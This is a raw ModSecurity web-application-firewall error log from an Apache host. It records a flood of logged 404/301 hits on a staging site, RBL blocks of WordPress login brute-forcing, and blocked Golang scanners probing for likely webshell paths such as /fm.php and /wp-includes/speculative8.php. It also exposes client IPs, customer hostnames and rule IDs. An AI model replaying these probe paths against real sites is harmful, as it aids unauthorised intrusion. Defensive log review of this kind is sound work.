[Tue May 26 19:59:47.343687 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1QAAAAEk"]
[Tue May 26 19:59:47.344082 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25--AAAAZQ"]
[Tue May 26 19:59:47.350511 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWYZZc2DoU1lPnP1SigAAAKc"]
[Tue May 26 19:59:47.353346 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1RAAAAA4"]
[Tue May 26 19:59:47.354862 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWYZZc2DoU1lPnP1SiAAAAIs"]
[Tue May 26 19:59:47.441831 2026] [security2:error] [pid 106517:tid 106572] [remote 176.95.46.127:57734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuW4ZZc2DoU1lPnP1SwAAA4DQ"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:59:47.772391 2026] [security2:error] [pid 93868:tid 94371] [client 103.163.220.38:42231] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/adminfuns.php"] [unique_id "ahWuW0qK9k_ZUB2Vp25_NwAAAgA"]
[Tue May 26 19:59:48.092478 2026] [security2:error] [pid 106517:tid 106527] [remote 41.111.171.131:55222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuW4ZZc2DoU1lPnP1S0QAAkAc"]
[Tue May 26 19:59:48.288067 2026] [security2:error] [pid 93576:tid 93817] [client 103.163.220.34:57253] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/speculative8.php"] [unique_id "ahWuXGDRMqfxdEDkosz1cAAAAGk"]
[Tue May 26 19:59:48.782201 2026] [security2:error] [pid 106517:tid 106700] [client 103.163.220.9:43951] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/222.php"] [unique_id "ahWuXIZZc2DoU1lPnP1S9gAAALY"]
[Tue May 26 19:59:49.283590 2026] [security2:error] [pid 106517:tid 106679] [client 103.163.220.19:50347] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/enhanced-text-widget/analyst/src/403.php"] [unique_id "ahWuXYZZc2DoU1lPnP1TDAAAAKE"]
[Tue May 26 19:59:49.597763 2026] [security2:error] [pid 106517:tid 106688] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuXYZZc2DoU1lPnP1TBAAAAKo"]
[Tue May 26 19:59:49.779594 2026] [security2:error] [pid 106517:tid 106694] [client 103.163.220.13:42711] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/fm.php"] [unique_id "ahWuXYZZc2DoU1lPnP1THgAAALA"]
[Tue May 26 19:59:50.074676 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TJQAAAIU"]
[Tue May 26 19:59:50.075026 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TJwAAANo"]
[Tue May 26 19:59:50.266203 2026] [security2:error] [pid 93576:tid 93746] [client 103.163.220.48:53185] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/classwithtostring.php"] [unique_id "ahWuXmDRMqfxdEDkosz1hwAAACI"]
[Tue May 26 19:59:50.774247 2026] [security2:error] [pid 106517:tid 106681] [client 103.163.220.18:44537] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/item.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TQQAAAKM"]
[Tue May 26 19:59:50.855810 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TRQAAAM8"]
[Tue May 26 19:59:50.857044 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TRgAAAPk"]
[Tue May 26 19:59:50.862370 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TRwAAANs"]
[Tue May 26 19:59:51.007551 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1zAAAAEU"]
[Tue May 26 19:59:51.010737 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1yQAAAEo"]
[Tue May 26 19:59:51.010970 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1pAAAACQ"]
[Tue May 26 19:59:51.012791 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1zQAAACA"]
[Tue May 26 19:59:51.016686 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1xwAAAA4"]
[Tue May 26 19:59:51.019403 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_XQAAAb8"]
[Tue May 26 19:59:51.024150 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1tgAAADI"]
[Tue May 26 19:59:51.030811 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TWwAAANI"]
[Tue May 26 19:59:51.036854 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1nwAAABQ"]
[Tue May 26 19:59:51.054856 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TWgAAALM"]
[Tue May 26 19:59:51.061558 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1wAAAAH0"]
[Tue May 26 19:59:51.065599 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1rAAAAAM"]
[Tue May 26 19:59:51.080335 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1ywAAAGk"]
[Tue May 26 19:59:51.089797 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1xQAAADE"]
[Tue May 26 19:59:51.095936 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1zgAAADw"]
[Tue May 26 19:59:51.096302 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1wwAAABk"]
[Tue May 26 19:59:51.096410 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1sQAAABg"]
[Tue May 26 19:59:51.099066 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1qwAAAEw"]
[Tue May 26 19:59:51.100178 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1yAAAAG4"]
[Tue May 26 19:59:51.101759 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1xAAAAAQ"]
[Tue May 26 19:59:51.107005 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TVwAAAM0"]
[Tue May 26 19:59:51.108795 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1twAAABw"]
[Tue May 26 19:59:51.115304 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TXQAAAJM"]
[Tue May 26 19:59:51.274759 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1sgAAAFc"]
[Tue May 26 19:59:51.275537 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz12AAAAFM"]
[Tue May 26 19:59:51.279598 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz10QAAAHI"]
[Tue May 26 19:59:51.282155 2026] [security2:error] [pid 106517:tid 106680] [client 103.163.220.32:31281] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/admin.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TaAAAAKI"]
[Tue May 26 19:59:51.289543 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz1wQAAAAU"]
[Tue May 26 19:59:51.290033 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_YwAAAcQ"]
[Tue May 26 19:59:51.290134 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz10AAAACc"]
[Tue May 26 19:59:51.297950 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_YgAAAZo"]
[Tue May 26 19:59:51.299743 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_YQAAAZI"]
[Tue May 26 19:59:51.301668 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_ZAAAAaI"]
[Tue May 26 19:59:51.314223 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz12QAAABs"]
[Tue May 26 19:59:51.315427 2026] [security2:error] [pid 106517:tid 106749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXoZZc2DoU1lPnP1TXwAAAOc"]
[Tue May 26 19:59:51.331144 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXmDRMqfxdEDkosz11gAAAGM"]
[Tue May 26 19:59:51.334582 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuXkqK9k_ZUB2Vp25_ZQAAAbA"]
[Tue May 26 19:59:51.338649 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TYgAAALs"]
[Tue May 26 19:59:51.381117 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz15wAAAB8"]
[Tue May 26 19:59:51.654728 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TfQAAAOI"]
[Tue May 26 19:59:51.655935 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TdQAAAIY"]
[Tue May 26 19:59:51.656238 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_cgAAAf8"]
[Tue May 26 19:59:51.659399 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TegAAAO4"]
[Tue May 26 19:59:51.660958 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz1_gAAAB0"]
[Tue May 26 19:59:51.662481 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2AAAAABg"]
[Tue May 26 19:59:51.674706 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2AQAAAFU"]
[Tue May 26 19:59:51.682962 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_dQAAAdY"]
[Tue May 26 19:59:51.683668 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TewAAAJc"]
[Tue May 26 19:59:51.684123 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz1_wAAADw"]
[Tue May 26 19:59:51.702099 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz1_AAAAAY"]
[Tue May 26 19:59:51.703182 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX2DRMqfxdEDkosz2AgAAABY"]
